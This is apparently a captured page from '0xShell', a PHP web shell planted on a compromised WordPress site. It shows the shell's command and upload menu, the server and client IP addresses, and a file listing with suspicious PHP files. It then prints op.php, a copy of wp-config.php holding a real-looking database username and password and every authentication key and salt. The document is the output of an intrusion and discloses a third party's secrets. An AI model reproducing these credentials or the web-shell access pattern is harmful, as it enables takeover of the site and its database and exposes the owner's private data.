0xShell Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload file System Info: User: couragent | UID: 1022 | GID: 1024 | Groups: 1024 Server IP: 62.72.47.222 | Client IP: 23.145.24.71 PHP: 8.1.29 | OS: Linux | Server: LiteSpeed command /home/couragent/public_html$ Enter file path to read Files ../ � .htaccess � '0e 4e5 .tmb/ � .user.ini � '0e 4e5 .well-known/ � 123.php � '0e 4e5 cgi-bin/ � clasa99.php � '0e 4e5 error_log � '0e 4e5 evs.txt � '0e 4e5 home/ � index.php � 4e5 license.txt � '0e 4e5 op.php � '0e 4e5 php.ini � '0e 4e5 readme.html � '0e 4e5 robots.txt � '0e 4e5 wp-activate.php � '0e 4e5 wp-admin/ � wp-blog-header.php � '0e 4e5 wp-comments-post.php � '0e 4e5 wp-config-sample.php � '0e 4e5 wp-config.php � '0e 4e5 wp-content/ � wp-cron.php � '0e 4e5 wp-includes/ � wp-links-opml.php � '0e 4e5 wp-load.php � '0e 4e5 wp-login.php � '0e 4e5 wp-mail.php � '0e 4e5 wp-settings.php � '0e 4e5 wp-signup.php � '0e 4e5 wp-trackback.php � '0e 4e5 xmlrpc.php � '0e 4e5 Viewing: op.php
<?php
// BEGIN iThemes Security - Do not modify or remove this line
// iThemes Security Config Details: 2
define( 'DISALLOW_FILE_EDIT', true ); // Disable File Editor - Security > Settings > WordPress Tweaks > File Editor
define( 'FORCE_SSL_ADMIN', true ); // Redirect All HTTP Page Requests to HTTPS - Security > Settings > Enforce SSL
// END iThemes Security - Do not modify or remove this line
//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dreamlif_MichaelsHappyFish.com' );
/** MySQL database username */
define( 'DB_USER', 'dreamlif_thedream_BossHog' );
/** MySQL database password */
define( 'DB_PASSWORD', '77Never!Ever$Stop%Keep$Trucking#1Michael<3' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'u#aQ^l %W${;EDjjPFupxAO<(l)NY^n[dKS7mtct[uM$)@+z-[yV[@gJOio$qg3$' );
define( 'SECURE_AUTH_KEY', 'cA3[&<veg{Mv!4of;9WziPT+h={;RsnJ6$|{cqr$+Gxf9F$.WAICH.)DJ}nQhBN`' );
define( 'LOGGED_IN_KEY', '|r@OH(zqn~$](;?F%}k*q cC@k4nW|E;*LqOg#Cz!^m/Jek>!:B:Gpzbn_O;SZ%V' );
define( 'NONCE_KEY', 'yb||m6>GYvD-1i.x5!YG!9a({Z[>RwCu!Z3KQz-NbdH{Oi}Bdjo||b:%+f2Kxhed' );
define( 'AUTH_SALT', '@yHDNG3TmB2$M0+~>^VXy9*`hRhPx:qrj8c[Ix _[.KKR*-J`B5{AWjVtB;BV,TS' );
define( 'SECURE_AUTH_SALT', 'W9KO~W@I8TM?6%;lV0%g!y*X%Z^H6,8rYw;Teh]j<9He&DOz&W+T9YVNE,Vjf-[m' );
define( 'LOGGED_IN_SALT', 'viSSMp3nz@5YFVrg@=0`Z;^~W,A4rg/bC2OZT9.PU=r5LrA-@`Rr;cs#A)1.O@HM' );
define( 'NONCE_SALT', 'CYylvtNSz,^w*>4Dw#::k_*(fICA2*|u(;3{{22y^]adIM4L7*;%7CSCHD`cPl[>' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'on8ed3r_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
define( 'DISABLE_WP_CRON', true );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** Sets up Auto Updates for Core, Plugins, and Themes. */
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
Disabled functions: None